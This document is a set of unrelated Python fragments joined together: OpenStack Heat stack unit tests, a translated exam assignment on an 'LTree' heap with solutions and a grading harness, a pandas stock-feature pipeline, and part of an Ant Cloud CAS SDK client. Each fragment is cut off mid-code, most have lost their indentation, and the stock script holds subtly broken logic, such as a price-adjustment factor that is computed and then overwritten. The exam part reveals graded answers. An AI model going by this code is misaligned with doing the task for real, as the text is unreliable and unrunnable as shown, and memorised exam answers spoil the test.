first_level_resources = list(resource_generator)
self.assertEqual(2, len(first_level_resources))
all_resources = list(self.stack.iter_resources(1))
self.assertEqual(5, len(all_resources))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_filters(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc = mock.MagicMock()
mock_rsc.name = 'A'
mock_rsc.current_template_id = self.stack.t.id
mock_db_call.return_value = {'A': mock_rsc}
all_resources = list(self.stack.iter_resources(
filters=dict(name=['A'])
))
# Verify, the db query is called with expected filter
mock_db_call.assert_has_calls([
mock.call(self.ctx, self.stack.id, dict(name=['A'])),
mock.call(self.ctx, self.stack.id),
])
# Make sure it returns only one resource.
self.assertEqual(1, len(all_resources))
# And returns the resource A
self.assertEqual('A', all_resources[0].name)
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_with_nonexistent_template(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id + 1)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
all_resources = list(self.stack.iter_resources())
self.assertEqual(1, len(all_resources))
@mock.patch.object(resource_objects.Resource, 'get_all_by_stack')
def test_iter_resources_nested_with_filters(self, mock_db_call):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources':
{'A': {'Type': 'StackResourceType'},
'B': {'Type': 'GenericResourceType'}}}
self.stack = stack.Stack(self.ctx, 'test_stack',
template.Template(tpl),
status_reason='blarg')
self.stack.store()
mock_rsc_a = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_a.name = 'A'
mock_rsc_b = mock.MagicMock(current_template_id=self.stack.t.id)
mock_rsc_b.name = 'B'
mock_db_call.return_value = {
'A': mock_rsc_a,
'B': mock_rsc_b
}
def get_more(nested_depth=0, filters=None):
if filters:
yield 'X'
mock_nested = self.patchobject(generic_rsrc.StackResourceType,
'nested')
mock_nested.return_value.iter_resources = mock.MagicMock(
side_effect=get_more)
all_resources = list(self.stack.iter_resources(
nested_depth=1,
filters=dict(name=['A'])
))
# Verify, the db query is called with expected filter
mock_db_call.assert_has_calls([
mock.call(self.ctx, self.stack.id, dict(name=['A'])),
mock.call(self.ctx, self.stack.id),
])
# Returns three resources (1 first level + 2 second level)
self.assertEqual(3, len(all_resources))
def test_load_parent_resource(self):
self.stack = stack.Stack(self.ctx, 'load_parent_resource', self.tmpl,
parent_resource='parent')
self.stack.store()
stk = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
t = template.Template.load(self.ctx, stk.raw_template_id)
self.m.StubOutWithMock(template.Template, 'load')
template.Template.load(
self.ctx, stk.raw_template_id, stk.raw_template
).AndReturn(t)
self.m.StubOutWithMock(stack.Stack, '__init__')
stack.Stack.__init__(self.ctx, stk.name, t, stack_id=stk.id,
action=stk.action, status=stk.status,
status_reason=stk.status_reason,
timeout_mins=stk.timeout,
disable_rollback=stk.disable_rollback,
parent_resource='parent', owner_id=None,
stack_user_project_id=None,
created_time=mox.IgnoreArg(),
updated_time=None,
user_creds_id=stk.user_creds_id,
tenant_id='test_tenant_id',
use_stored_context=False,
username=mox.IgnoreArg(),
convergence=False,
current_traversal=self.stack.current_traversal,
prev_raw_template_id=None,
current_deps=None, cache_data=None,
nested_depth=0,
deleted_time=None)
self.m.ReplayAll()
stack.Stack.load(self.ctx, stack_id=self.stack.id)
self.m.VerifyAll()
def test_identifier(self):
self.stack = stack.Stack(self.ctx, 'identifier_test', self.tmpl)
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.tenant_id, identifier.tenant)
self.assertEqual('identifier_test', identifier.stack_name)
self.assertTrue(identifier.stack_id)
self.assertFalse(identifier.path)
def test_get_stack_abandon_data(self):
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Parameters': {'param1': {'Type': 'String'}},
'Resources':
{'A': {'Type': 'GenericResourceType'},
'B': {'Type': 'GenericResourceType'}}}
resources = '''{"A": {"status": "COMPLETE", "name": "A",
"resource_data": {}, "resource_id": null, "action": "INIT",
"type": "GenericResourceType", "metadata": {}},
"B": {"status": "COMPLETE", "name": "B", "resource_data": {},
"resource_id": null, "action": "INIT", "type": | |
from __future__ import print_function  # compatibility with Python 2.7
import sys
# Implementation test IB002 2016 - LTree (max 50 points)
#
# Your task is to implement four functions for the "LTree" data structure.
# You may of course add your own helper functions.
#
# LTree is a data structure used for storing keys of type integer.
# For simplicity we will assume in this task that the keys are unique,
# i.e. if some key is stored in the structure, no other key has the
# same value, not even in another tree (in task 4).
#
# LTree is a binary tree that stores a key 'key' in every node plus an
# auxiliary value 'S'. An LTree must satisfy the following properties:
#
# - The key of a node must always be smaller than the keys of its children.
#
# - The value 'S' is the distance to the nearest "None descendant" in the node's subtree.
# - A leaf (both children are 'None') has 'S' equal to 1.
# - A node with one child (the other one being 'None') has 'S' equal to 1.
#
# - The 'S' value of the left child must be greater than or equal to the 'S' value of the right child.
# - A node with a single child has only a left child.
#
# An empty tree is therefore also an LTree.
#
# Simple examples (the printed values are keys):
#   are LTree            are not LTree
#     1        4          4        2
#    / \      /          /        / \
#   2   3    7          2          4
#
# For more complex examples you can look at the attached pdf.
#
# Your first task is to write the function getLeafsKeys, which adds the keys
# of all leaves of the given tree to the prepared list.
#
# The second task is to write a function that computes and fills in the S values
# in the nodes of the given binary tree.
#
# The third task is to write a function that checks whether the given tree
# is a correct LTree.
#
# The last, fourth task is to write the merge function according to the
# algorithm described below.
#
# The individual functions are scored as follows:
#
# 1st task (10 points): getLeafsKeys
# 2nd task (10 points): computeS
# 3rd task (10 points): isCorrectLTree
# 4th task (20 points): merge
# Structure for representing a node of an LTree.
# 'key' is the key of the node
# 'S' is the S value of the given node.
#
# 'left' is the left child, i.e. an attribute of type Node if the child exists, otherwise None
# 'right' is analogous to left
class Node:
def __init__(self):
self.key = None
self.S = None
self.left = None
self.right = None
# Class for representing an LTree.
# 'root' is the root of the tree and is of type Node, or None if the tree is empty.
class LTree:
def __init__(self):
self.root = None
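# A small illustrative helper (not part of the original assignment): it builds
# the first correct LTree from the examples above (key 1 with children 2 and 3)
# and fills in the S values by hand, so you can see what a valid tree looks like.
def example_ltree():
    root = Node()
    root.key = 1
    root.left = Node()
    root.left.key = 2
    root.right = Node()
    root.right.key = 3
    # Both children are leaves, so their S is 1; the nearest None descendant
    # of the root is two edges away, so its S is 2.
    root.left.S = 1
    root.right.S = 1
    root.S = 2
    tree = LTree()
    tree.root = root
    return tree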
# Stores the keys of the leaves of the given tree in the prepared list 'list'.
# The order of the keys in 'list' is not important.
#
# :param 'tree' tree, of type LTree, whose leaf keys should be stored in the list
# :param 'list' list to which the leaf keys of the tree 'tree' should be added
#
# To insert into the list use the function append(key), where 'key' is the key being added.
# Do not modify the list in any other way!
def get_leafs_keys_recursion(node, result_list):
    if node is None:
        return
    if node.left is None and node.right is None:
        # A leaf: store its key and stop, there is nothing below it to visit.
        result_list.append(node.key)
        return
    get_leafs_keys_recursion(node.left, result_list)
    get_leafs_keys_recursion(node.right, result_list)
def getLeafsKeys(tree, result_list) :
if tree.root is not None:
get_leafs_keys_recursion(tree.root, result_list)
# Computes and fills in the S values for all nodes of the tree 'tree'. This
# function should work for an arbitrary binary tree, i.e. regardless of LTree correctness.
#
# :param 'tree' tree in which the S values should be computed and then
# stored.
def compute_s_recursion(node):
if node is None:
return 0
l = compute_s_recursion(node.left)
r = compute_s_recursion(node.right)
result = min(l, r) + 1
node.S = result
return result
def computeS(tree):
compute_s_recursion(tree.root)
# @brief Checks whether the tree 'tree' is a correct LTree
# :param 'tree' tree, of type LTree, to be checked
# :return True if tree is a correct LTree, otherwise False
#
# To pass the tests you need a working computeS function.
# The computeS function is called before every test.
# - The key of a node must always be smaller than the keys of its children.
#
# - The value 'S' is the distance to the nearest "None descendant" in the node's subtree.
# - A leaf (both children are 'None') has 'S' equal to 1.
# - A node with one child (the other one being 'None') has 'S' equal to 1.
#
# - The 'S' value of the left child must be greater than or equal to the 'S' value of the right child.
# - A node with a single child has only a left child.
#
# An empty tree is therefore also an LTree.
def is_correct_lt_tree_recursion(node, parent):
if node is None:
return True
if parent is not None and parent.key >= node.key:
return False
if node.left is None and node.right is not None:
return False
return is_correct_lt_tree_recursion(node.left, node) and is_correct_lt_tree_recursion(node.right, node)
def is_correct_s_attribute_recursion(node):
if node is None:
return True, 0
bool_one, l = is_correct_s_attribute_recursion(node.left)
bool_two, r = is_correct_s_attribute_recursion(node.right)
result = min(l, r) + 1
if l < r:
return False, result
if not bool_one or not bool_two:
return False, result
if node.S != result:
return False, result
return True, result
def isCorrectLTree(tree):
if not is_correct_lt_tree_recursion(tree.root, None):
return False
bool_result, number = is_correct_s_attribute_recursion(tree.root)
return bool_result
# @brief The merge operation joins the trees 'U' and 'V'.
#
# :param 'U' tree, of type LTree, to be merged with 'V'
# :param 'V' tree, of type LTree, to be merged with 'U'
# :return the root of the merge of 'U' and 'V'
#
# ################################################
# If one of the trees is empty, the function returns the root of the other one.
#
# Denote the root of 'U' as 'u' and the root of 'V' as 'v'.
# For simplicity assume that the key of root 'u' is smaller than the key of
# root 'v'; handle the opposite case symmetrically. Thanks to the uniqueness
# of the keys you can ignore equality, it does not occur.
#
# If 'u' has no right child, 'v' becomes the right child of 'u'.
# If 'u' has a right child 'w', we must replace it with the merge of 'w' and 'v'.
#
# If, after merging 'w' and 'v', the right child of 'u' would have a larger S
# than its left child, we must swap the two children.
#
# For an example see the attached pdf.
#
# ################################################
# The input is two correct LTrees 'U' and 'V'.
#
# The output is the root of a correct LTree. A correct implementation of the
# algorithm described above leads to a unique solution, i.e. the solution is
# exactly one particular tree.
def merge_subtrees(u, v):
    # Helper: recursively merge two subtrees following the algorithm described
    # above; returns the root of the merged subtree and keeps S values updated.
    if u is None:
        return v
    if v is None:
        return u
    # Keep the node with the smaller key on top.
    if u.key > v.key:
        u, v = v, u
    # Replace the right child of 'u' with the merge of that child and 'v'.
    u.right = merge_subtrees(u.right, v)
    left_s = u.left.S if u.left is not None else 0
    right_s = u.right.S if u.right is not None else 0
    # Restore the LTree property: S of the left child >= S of the right child.
    if left_s < right_s:
        u.left, u.right = u.right, u.left
        left_s, right_s = right_s, left_s
    u.S = right_s + 1
    return u
def merge(U, V) :
    if U.root is None:
        return V.root
    if V.root is None:
        return U.root
    return merge_subtrees(U.root, V.root)
# ######################################################################
# ## The test code follows, DO NOT MODIFY IT ##
# ######################################################################
"""
A note on Graphviz:
Graphviz is a tool that lets you visualize data structures,
which is useful above all for debugging.
This program generates several files named something.dot in main.
Upload the generated files to an online Graphviz viewer:
http://sandbox.kidstrythisathome.com/erdos/
or http://graphviz-dev.appspot.com/ - it handles larger graphs too
Alternatively, you can install a compiler from the dot language to images on your own computer.
"""
def makeGraphviz(node, f):
if (node == None): return
if (node.S is not None):
f.write("%i [label = \"%i\\nS=%i\"]\n" % (node.key, node.key, node.S))
if (node.left is not None):
f.write("%i -> %i\n" % (node.key, node.left.key))
makeGraphviz(node.left, f)
else:
f.write("L{} [label=\"\",color=white]\n{} -> L{}\n".format(id(node), node.key, id(node)))
if (node.right is not None):
f.write("%i -> %i\n" % (node.key, node.right.key))
makeGraphviz(node.right, f)
else:
f.write("R{} [label=\"\",color=white]\n{} -> R{}\n".format(id(node), node.key, id(node)))
def makeGraph(tree, fileName):
f = open(fileName, 'w')
f.write("digraph Tree {\n")
f.write("node [color=lightblue2, style=filled];\n")
if (tree is not None) and (tree.root is not None):
makeGraphviz(tree.root, f)
f.write("}\n")
f.close()
def makeSubtree(s, node) :
leftValue = s.pop(0)
if leftValue is not None :
left = Node()
left.key = leftValue
node.left = left
makeSubtree(s, left)
rightValue = s.pop(0)
if rightValue is not None :
right = Node()
right.key = rightValue
node.right = right
makeSubtree(s, right)
def makeTree(s) :
key = s.pop(0)
if key is None :
return None
root = Node()
root.key = key
makeSubtree(s, root)
return root
def printNodeKeys(node, keys) :
if node is None :
keys.append(None)
return
keys.append(node.key)
printNodeKeys(node.left, keys)
printNodeKeys(node.right, keys)
def printTreeKeys(tree) :
keys = []
printNodeKeys(tree.root, keys)
return keys
def printNodeS(node, SVals) :
if node is None :
SVals.append(None)
return
SVals.append(node.S)
printNodeS(node.left, SVals)
printNodeS(node.right, SVals)
def printTreeS(tree) :
SVals = []
printNodeS(tree.root, SVals)
return SVals
def testgetLeafsKeys() :
TEST_COUNT = 5
treeCodes = [
[10, 20, None, None, None],
[10, None, None],
[None],
[2, 4, 9, None, None, 5, None, None, 6, 8, None, None, 7, None, None],
[2, 4, None, None, 6, None, None]
]
expectedResults = [
[20],
[10],
[],
[5, 7, 8, 9],
[4, 6]
]
checkTrees = [
[10, 20, None, None, None],
[10, None, None],
[None],
[2, 4, 9, None, None, 5, None, None, 6, 8, None, None, 7, None, None],
[2, 4, None, None, 6, None, None]
]
failure = 0
print("Test 1. getLeafsKeys: ")
tree = LTree()
for i in range(TEST_COUNT):
tree.root = makeTree(treeCodes[i])
list = []
getLeafsKeys(tree, list)
list.sort()
if (list != expectedResults[i]) or (printTreeKeys(tree) != checkTrees[i]):
failure = i + 1
break
if failure != 0 :
print("NOK%d | |
import numpy as np
import pandas as pd
import collect as clct
import constants
import db_operations as dbop
def _check_int(arg):
if type(arg) != int:
raise ValueError("{} is not a int".format(arg))
def _check_iterable(arg):
if not hasattr(arg, "__iter__"):
raise ValueError("{} is not iterable".format(arg))
def _make_iterable(arg):
if type(arg) == str or not hasattr(arg, "__iter__"):
return [arg]
else:
return arg
def _prefix(prefix, df: pd.DataFrame, copy=False):
if copy:
df = df.copy()
df.columns = list(map(lambda col: str(prefix) + "_" + col, df.columns))
return df
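# _move(days, df, cols) aligns each selected column with the value that sits
# abs(days) rows further down the frame (the frames built below are sorted by
# date in descending order). A positive 'days' therefore pulls past values and
# prefixes the columns with "p{days}mv"; a negative 'days' pulls future values
# and prefixes them with "f{days}mv".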
def _move(days, df: pd.DataFrame, cols=None, prefix=True):
_check_int(days)
if cols is None:
cols = df.columns
cols = _make_iterable(cols)
if days > 0:
pre = "p{}mv".format(abs(days))
df_mv = df[cols].iloc[days:].copy()
df_mv.index = df.index[:-days]
else:
pre = "f{}mv".format(abs(days))
df_mv = df[cols].iloc[:days].copy()
df_mv.index = df.index[-days:]
if prefix:
return _prefix(pre, df_mv)
else:
return df_mv
def _rolling(rolling_type, days, df: pd.DataFrame, cols, move=0,
has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
if rolling_type == "max":
df_rolling = df[cols].rolling(window=abs(days)).max()
elif rolling_type == "min":
df_rolling = df[cols].rolling(window=abs(days)).min()
elif rolling_type == "mean":
        df_rolling = df[cols].rolling(window=abs(days)).mean()
else:
raise ValueError(
"rolling_type='{}' is not supported.".format(rolling_type))
if move != 0:
df_rolling = _move(move, df_rolling)
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + rolling_type
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + rolling_type
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_max(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).max()
if move != 0:
# print("--------",move)
# print(df_rolling[df["code"] == "600887.SH"]["high"].iloc[:30])
df_rolling = _move(move,
df_rolling) # print(df_rolling[df["code"] == "600887.SH"]["f1mv_high"].iloc[:30])
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "max"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[
period - 1:n] # df_rolling = df_rolling.iloc[period-1:n+move] # df_rolling.index = df.index[period-1-move:n]
else:
pre = "p" + str(abs(days)) + "max"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
# df_rolling = df_rolling.iloc[period-1+move:n] # df_rolling.index = df.index[:n-period+1-move]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_min(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).min()
if move != 0:
# print("--------",move)
# print(df_rolling[df["code"] == "600887.SH"]["high"].iloc[:30])
df_rolling = _move(move,
df_rolling) # print(df_rolling[df["code"] == "600887.SH"]["f1mv_high"].iloc[:30])
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "min"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + "min"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_mean(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).mean()
if move != 0:
df_rolling = _move(move, df_rolling)
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "mean"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + "mean"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def change_rate(df1: pd.DataFrame, df2: pd.DataFrame, cols1=None, cols2=None):
if cols1:
df1 = df1[cols1].copy()
if cols2:
df2 = df2[cols2].copy()
if df1.shape[1] != df2.shape[1]:
raise ValueError(
"Column length not the same:{0}!={1}".format(df1.shape[1],
df2.shape[1]))
df1 = df1.copy()
df1.columns = df2.columns
df3 = (df2 - df1) / df1
df3 = _prefix("change_rate", df3)
return df3
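# A minimal usage sketch with synthetic data (demo_change_rate is only an
# illustration and is not used by the pipeline below): combining change_rate
# with _move produces the "change_rate_p{n}mv_<col>" feature columns that
# proc_stck_d builds further down.
def demo_change_rate():
    df = pd.DataFrame({"close": [10.0, 9.5, 9.0]},
                      index=["2018-01-03", "2018-01-02", "2018-01-01"])
    # For each date this yields (previous close - current close) / current
    # close in a single column named "change_rate_p1mv_close".
    return change_rate(df, _move(1, df, "close"))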
def create_df(cursor, table_name, start=None):
if start:
sql_select = "select * from {0} where date>='{1}'".format(table_name,
start)
else:
sql_select = "select * from {0}".format(table_name)
cursor.execute(sql_select)
df = pd.DataFrame(cursor.fetchall())
df.columns = dbop.cols_from_cur(cursor)
return df
def prepare_stck_d(df_stck_d):
df_stck_d = df_stck_d.set_index(["date"]).sort_index(ascending=False)
df_stck_d = df_stck_d[
["code", "open", "high", "low", "close", "vol", "amt", "adj_factor"]]
return df_stck_d
def prepare_idx_d(df_idx_d):
df_idx_d = df_idx_d.set_index("date").sort_index(ascending=False)
return df_idx_d
def prepare_each_stck(df_stck, qfq_type="hfq"):
if qfq_type and qfq_type not in ["hfq","qfq"]:
raise ValueError("qfq_type {} is not supported".format(qfq_type))
df_stck = df_stck.copy()
fq_cols = ["open", "high", "low", "close"]
for col in fq_cols:
df_stck[col+"0"] = df_stck[col]
# backward adjustment (hfq)
if qfq_type=="qfq":
qfq_factor = np.array(df_stck["adj_factor"]
/ df_stck["adj_factor"].iloc[0])
# print(qfq_factor.shape)
qfq_factor = np.array(df_stck["adj_factor"]).reshape(-1, 1) * np.ones(
(1, len(fq_cols)))
# print(df_stck[fq_cols].dtypes)
# print(qfq_factor.shape, qfq_factor.dtype)
# print(df_stck[fq_cols]/qfq_factor)
df_stck.loc[:, fq_cols] = df_stck[fq_cols] * qfq_factor
return df_stck
def proc_stck_d(df_stck_d, pred_period=10):
df_stck_d = prepare_stck_d(df_stck_d)
df_stck_list = []
cols_move = ["open", "high", "low", "close", "amt"]
cols_roll = ["open", "high", "low", "close", "amt"]
fq_cols = ["open", "high", "low", "close"]
cols_future = None
for code, df in df_stck_d.groupby("code"):
df = df.sort_index(ascending=False)
df = prepare_each_stck(df)
df_label_min = _rolling_min(pred_period, df, "low", move=-1)
df_label_max = _rolling_max(pred_period - 1, df, "high", move=-2)
p1 = (pred_period - 1) // 3
p2 = p1
p3 = pred_period - 1 - p1 - p2
df_label_mean1 = _rolling_mean(p1, df, "open", move=-2)
df_label_mean2 = _rolling_mean(p2, df, "open", move=-2 - p1)
df_label_mean3 = _rolling_mean(p3, df, "open", move=-2 - p1 - p2)
# print(df_label_min.columns)
df_tomorrow = _move(-1, df, ["open", "high", "low", "close"])
# df_label_min = _rolling_min(pred_period,df,"low")
# if code == "000002.SZ":
# tmp = _rolling_min(-5,df,cols_roll).loc["2018-08-07"]
# print(tmp)
df_move_list = [change_rate(df[cols_move], _move(i, df, cols_move)) for
i in range(1, 6)]
df_qfq = df[fq_cols] / df["adj_factor"].iloc[0]
qfq_cols = ["qfq_"+col for col in fq_cols]
df_tomorrow_qfq = _move(-1, df_qfq)
df_rolling_list = [(change_rate(df[cols_roll],
_rolling_max(i, df, cols_roll)),
change_rate(df[cols_roll],
_rolling_min(i, df, cols_roll)),
change_rate(df[cols_roll],
_rolling_mean(i, df, cols_roll))) for i
in [-5, -10, -20, -60, -120, -250]]
df_roll_flat_list = []
for df_rolling_group in df_rolling_list:
df_roll_flat_list.extend(df_rolling_group)
df_labels = pd.concat(
[df_tomorrow,df_tomorrow_qfq, df_label_max, df_label_min, df_label_mean1,
df_label_mean2, df_label_mean3], axis=1, sort=False)
df_stck = pd.concat(
[df,df_qfq] + df_move_list + df_roll_flat_list + [df_labels], axis=1,
sort=False)
df_stck_list.append(df_stck)
if not cols_future:
cols_future = list(df_labels)
# print(tmp.shape)
# print(tmp[tmp[col_label].isnull()])
# if code == "002217.SZ":
# print(df[df.index == "2018-01-02"])
# print(df_stck[df_stck.index == "2018-01-02"])
df_stck_d_all = pd.concat(df_stck_list, sort=False)
# for df in df_stck_list:
# print(df["code"].unique(), df.shape)
# print(df["code"].unique(), df[df.index >= "2018-01-01"].shape)
print("count stck", len(
df_stck_d_all["code"][df_stck_d_all.index >= "2018-01-01"].unique()))
print(df_stck_d_all.shape)
return df_stck_d_all, cols_future
def proc_idx_d(df_idx_d: pd.DataFrame):
df_idx_d = prepare_idx_d(df_idx_d)
cols_move = ["open", "high", "low", "close", "vol"]
cols_roll = cols_move
df_idx_list = []
for name, group in df_idx_d.groupby("code"):
group = group.sort_index(ascending=False)
del group["code"]
df_move_list = [
change_rate(group[cols_move], _move(i, group, cols_move)) for i in
range(1, 6)]
df_rolling_list = [(change_rate(group[["high", "vol"]],
_rolling_max(i, group,
["high", "vol"])),
change_rate(group[["low", "vol"]],
_rolling_min(i, group,
["low", "vol"])),
change_rate(group[["open", "close", "vol"]],
_rolling_mean(i, group,
["open", "close",
"vol"]))) for i in
[-5, -10, -20, -60, -120, -250, -500]]
df_roll_flat_list = []
for df_rolling_group in df_rolling_list:
df_roll_flat_list.extend(df_rolling_group)
tmp_list = [group] + df_move_list + df_roll_flat_list
tmp = pd.concat(tmp_list, axis=1, sort=False)
df_idx_list.append(_prefix(name, tmp))
df_idx_d = pd.concat(df_idx_list, axis=1, sort=False)
return df_idx_d
def prepare_data(cursor, pred_period=10, start=None):
stock_day, index_day = constants.STOCK_DAY[clct.TABLE], constants.INDEX_DAY[
clct.TABLE]
print("start:",start)
df_stck_d = create_df(cursor, stock_day, start)
print("min_date",min(df_stck_d.date))
df_idx_d = create_df(cursor, index_day, start)
df_stck_d_all, cols_future = proc_stck_d(df_stck_d,
pred_period=pred_period)
print(df_stck_d_all.shape)
df_idx_d = proc_idx_d(df_idx_d)
print(df_idx_d.shape, len(df_idx_d.index.unique()))
df_all = df_stck_d_all.join(df_idx_d)
print(df_all.shape)
# print(df_all[(df_all.index == "2018-01-02") & (
# df_all["code"] == "002217.SZ")])
return df_all, cols_future
def feature_select(X, y):
import sklearn.ensemble as ensemble
clf = ensemble.ExtraTreesClassifier(random_state=0)
clf.fit(X, y)
import sklearn.feature_selection as fselect
model = fselect.SelectFromModel(clf, prefit=True)
X_new = model.transform(X)
print("selected feature number:", X_new.shape)
return X_new, model
def main():
db_type = "sqlite3"
#
# conn = dbop.connect_db(db_type)
# cursor = conn.cursor()
#
# pred_period=20
# df_all,cols_future = prepare_data(cursor,pred_period=pred_period,start="2011-01-01")
#
# # test
# # df_test = df_all[df_all["code"]=="600887.SH"]
# # basic_cols = ["open", "high", "low", "close", "amt", "adj_factor"]
# # derived_cols = ['change_rate_p1mv_open', 'change_rate_p1mv_high',
# # 'change_rate_p1mv_low', 'change_rate_p1mv_close',
# # 'change_rate_p1mv_amt', 'change_rate_p3mv_open',
# # 'change_rate_p3mv_high', 'change_rate_p3mv_low',
# # 'change_rate_p3mv_close', 'change_rate_p3mv_amt',
# # 'change_rate_p5mv_open', 'change_rate_p5mv_high',
# # 'change_rate_p5mv_low', 'change_rate_p5mv_close',
# # 'change_rate_p5mv_amt', 'change_rate_p5max_open',
# # 'change_rate_p5max_high', 'change_rate_p5max_low',
# # 'change_rate_p5max_close', 'change_rate_p5max_amt',
# # 'change_rate_p5min_open', 'change_rate_p5min_high',
# # 'change_rate_p5min_low', 'change_rate_p5min_close',
# # 'change_rate_p5min_amt', 'change_rate_p5mean_open',
# # 'change_rate_p5mean_high', 'change_rate_p5mean_low',
# # 'change_rate_p5mean_close', 'change_rate_p5mean_amt',
# # 'change_rate_p20max_open', 'change_rate_p20max_high',
# # 'change_rate_p20max_low', 'change_rate_p20max_close',
# # 'change_rate_p20max_amt', 'change_rate_p20min_open',
# # 'change_rate_p20min_high', 'change_rate_p20min_low',
# # 'change_rate_p20min_close', 'change_rate_p20min_amt',
# # 'change_rate_p20mean_open', 'change_rate_p20mean_high',
# # 'change_rate_p20mean_low', 'change_rate_p20mean_close',
# # 'change_rate_p20mean_amt', 'f1mv_open', 'f1mv_high',
# # 'f1mv_low', 'f1mv_close', 'f20max_f1mv_high',
# # 'sz50_open', 'sz50_high', 'sz50_low', 'sz50_close',
# # 'sz50_vol', 'sz50_change_rate_p1mv_open',
# # 'sz50_change_rate_p1mv_high',
| |
cas_models.ListAppgroupResponse:
"""
Description: Get the list of application groups
Summary: Get the list of application groups
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_appgroup_ex_async(
self,
request: cas_models.ListAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupResponse:
"""
Description: Get the list of application groups
Summary: Get the list of application groups
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def exist_appgroup(
self,
request: cas_models.ExistAppgroupRequest,
) -> cas_models.ExistAppgroupResponse:
"""
Description: Check whether the application group exists
Summary: Check whether the application group exists
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.exist_appgroup_ex(request, headers, runtime)
async def exist_appgroup_async(
self,
request: cas_models.ExistAppgroupRequest,
) -> cas_models.ExistAppgroupResponse:
"""
Description: Check whether the application group exists
Summary: Check whether the application group exists
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.exist_appgroup_ex_async(request, headers, runtime)
def exist_appgroup_ex(
self,
request: cas_models.ExistAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistAppgroupResponse:
"""
Description: Check whether the application group exists
Summary: Check whether the application group exists
"""
UtilClient.validate_model(request)
return cas_models.ExistAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def exist_appgroup_ex_async(
self,
request: cas_models.ExistAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistAppgroupResponse:
"""
Description: Check whether the application group exists
Summary: Check whether the application group exists
"""
UtilClient.validate_model(request)
return cas_models.ExistAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def create_appgroup(
self,
request: cas_models.CreateAppgroupRequest,
) -> cas_models.CreateAppgroupResponse:
"""
Description: Create an application group
Summary: Create an application group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.create_appgroup_ex(request, headers, runtime)
async def create_appgroup_async(
self,
request: cas_models.CreateAppgroupRequest,
) -> cas_models.CreateAppgroupResponse:
"""
Description: Create an application group
Summary: Create an application group
"""
runtime = util_models.RuntimeOptions()
headers = {}
